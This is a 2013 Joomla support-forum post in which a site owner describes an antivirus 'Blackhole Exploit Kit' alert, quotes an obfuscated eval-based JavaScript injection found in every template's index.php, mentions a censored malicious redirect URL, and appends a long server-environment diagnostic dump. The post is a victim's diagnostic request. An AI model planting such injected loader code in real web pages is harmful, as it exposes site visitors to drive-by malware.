Today I got a call from a friend whose website I made short time ago that she gets an error message from AVG saying that a Threat was blocked.
I visited the website with an empty sandbox and different browsers but no such message appeared on one of my PCs (Win7 x64 / Win XP). Neither from AVG - which I installed to test - nor any other virus or malware scanner (Avira, SUPERAntispyware, Malwarebytes).AVG wrote:File name: domain.tld/index.php
Threat name: Exploit Blackhole Eploit Kit (type 2704)
Scan report from virustotal.com was also fine. Only suspicios is the scan from Wepawet that shows a request to about:blank and to h$$$://w$$.people-search-global.c$$/clicker.php (censored to avoid accidantal clicking). Link to report
So I had a further look and found a JS in every templates index.php file
Code: Select all
<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > ps=\"split\";e=eval;v=\"0x\";a=0;z=\"y\";try{a*=25}catch(zz){a=1}if(!a){try{--e(\"doc\"+\"ument\")[\"\x62od\"+z]}catch(q){a2=\"_\";sa=0xa-02;}z=3_15_12_15_12__12_85_15_12_85_15_12\"[ps](a2);za=\"\";for(i=0;i<z.length;i++){za+=String[\"fromCharCode\"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}</script>";
#/0c0896#
?>
I've replaced all the index.php files with the original installation file. I'm only using a slightly changed (CSS, PHP) protostar template for the website, no 3rd party templates.
I have not found any suspicios files with jamss.php (scanned after I've replaced the templates index.php files).
I also had a look at the database but I couldn't find anything unordinary there.
And here is what fpa says:
Problem Description :: Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:Virus alert on website
Actions Taken To Resolve by Forum Post Assistant (v1.2.3) 24th June 2013 wrote:See description above.
Of course I've changed all administrator passwords, FTP password and mySQL password.Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.1.1-Stable (Ember) 26-April-2013
Joomla! Platform :: Joomla Platform 12.2.0-Stable (Neil Armstrong) 21-September-2012
Joomla! Configured :: Yes | Writable (644) | Owner: zursonnenuhr (uid: 1/gid: 1) | Group: site520 (gid: 1) | Valid For: 3.1
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-348.3.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/.sites/315/site520/web | System TMP Writable: No
PHP Configuration :: Version: 5.3.21 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 30711 | Log Errors To: /var/log/httpd/php.log | Last Known Error: | Register Globals: 0 | Magic Quotes: | Safe Mode: | Open Base: /home/.sites/315/site520/web:/home/.sites/315/site520/tmp:/usr/share/pear | Uploads: 1 | Max. Upload Size: 40M | Max. POST Size: 50M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 55M
MySQL Configuration :: Version: 5.1.67 (Client:mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 1014.11 KiB | #of Tables: 67Detailed Environment :: wrote:PHP Extensions :: Core (5.3.21) | date (5.3.21) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | intl (1.1.0) | json (1.2.1) | mbstring () | mcrypt () | standard (5.3.21) | mysqlnd (mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | mysqli (0.1) | mysql (1.0) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | Phar (2.0.1) | posix () | Reflection ($Id: 4af6c4c676864b1c0bfa693845af0688645c37cf $) | imap () | SimpleXML (0.1) | soap () | sockets () | SQLite (2.0-dev) | exif (1.4 $Id$) | suhosin (0.9.33) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions ::
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: NoFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) :: error/ (775) |Extensions Discovered :: wrote:Components :: SITE :: com_mailto (3.0.0) | com_wrapper (3.0.0) |
Components :: ADMIN :: com_easybookreloaded (3-1) | com_media (3.0.0) | com_checkin (3.0.0) | com_search (3.0.0) | com_installer (3.0.0) | com_content (3.0.0) | com_plugins (3.0.0) | com_redirect (3.0.0) | com_categories (3.0.0) | com_config (3.0.0) | com_tags (3.1.0) | com_weblinks (3.0.0) | com_login (3.0.0) | com_messages (3.0.0) | com_cache (3.0.0) | com_users (3.0.0) | com_admin (3.0.0) | com_cpanel (3.0.0) | com_finder (3.0.0) | com_menus (3.0.0) | com_banners (3.0.0) | com_templates (3.0.0) | com_newsfeeds (3.0.0) | com_modules (3.0.0) | com_joomlaupdate (3.0.0) | com_languages (3.0.0) |
Modules :: SITE :: mod_random_image (3.0.0) | mod_wrapper (3.0.0) | mod_articles_category (3.0.0) | mod_stats (3.0.0) | mod_articles_popular (3.0.0) | mod_related_items (3.0.0) | mod_login (3.0.0) | mod_languages (3.0.0) | mod_weblinks (3.0.0) | mod_tags_similar (3.1.0) | mod_tags_popular (3.1.0) | mod_articles_news (3.0.0) | mod_articles_archive (3.0.0) | mod_feed (3.0.0) | mod_articles_latest (3.0.0) | mod_users_latest (3.0.0) | mod_syndicate (3.0.0) | mod_breadcrumbs (3.0.0) | mod_finder (3.0.0) | mod_whosonline (3.0.0) | mod_menu (3.0.0) | mod_footer (3.0.0) | mod_search (3.0.0) | mod_custom (3.0.0) | mod_banners (3.0.0) | mod_articles_categories (3.0.0) |
Modules :: ADMIN :: mod_stats_admin (3.0.0) | mod_status (3.0.0) | mod_login (3.0.0) | mod_title (3.0.0) | mod_toolbar (3.0.0) | mod_quickicon (3.0.0) | mod_feed (3.0.0) | mod_submenu (3.0.0) | mod_popular (3.0.0) | mod_menu (3.0.0) | mod_logged (3.0.0) | mod_custom (3.0.0) | mod_multilangstatus (3.0.0) | mod_latest (3.0.0) | mod_version (3.0.0) |
Plugins :: SITE :: PLG_CONTENT_SIGE (3-1) | plg_content_pagebreak (3.0.0) | plg_content_finder (3.0.0) | plg_content_pagenavigation (3.0.0) | plg_content_vote (3.0.0) | plg_content_emailcloak (3.0.0) | plg_content_joomla (3.0.0) | plg_content_loadmodule (3.0.0) | plg_quickicon_joomlaupdate (3.0.0) | plg_quickicon_extensionupdate (3.0.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.5.6) | plg_system_sef (3.0.0) | plg_system_remember (3.0.0) | plg_system_languagecode (3.0.0) | plg_system_cache (3.0.0) | plg_system_p3p (3.0.0) | plg_system_logout (3.0.0) | plg_system_redirect (3.0.0) | plg_system_highlight (3.0.0) | plg_system_languagefilter (3.0.0) | plg_system_debug (3.0.0) | plg_system_log (3.0.0) | plg_finder_content (3.0.0) | plg_finder_contacts (3.0.0) | plg_finder_newsfeeds (3.0.0) | plg_finder_categories (3.0.0) | plg_finder_tags (3.0.0) | plg_finder_weblinks (3.0.0) | plg_extension_joomla (3.0.0) | plg_editors-xtd_pagebreak (3.0.0) | plg_editors-xtd_readmore (3.0.0) | plg_editors-xtd_image (3.0.0) | plg_editors-xtd_article (3.0.0) | plg_authentication_joomla (3.0.0) | plg_authentication_gmail (3.0.0) | plg_authentication_ldap (3.0.0) | plg_search_content (3.0.0) | plg_search_contacts (3.0.0) | plg_search_newsfeeds (3.0.0) | plg_search_categories (3.0.0) | plg_search_weblinks (3.0.0) | plg_captcha_recaptcha (3.0.0) | plg_user_contactcreator (3.0.0) | plg_user_profile (3.0.0) | plg_user_joomla (3.0.0) |Templates Discovered :: wrote:Templates :: SITE :: beez3 (3.1.0) | protostar (1.0) | protostar (1.0) |
Templates :: ADMIN :: hathor (3.0.0) | isis (1.0) |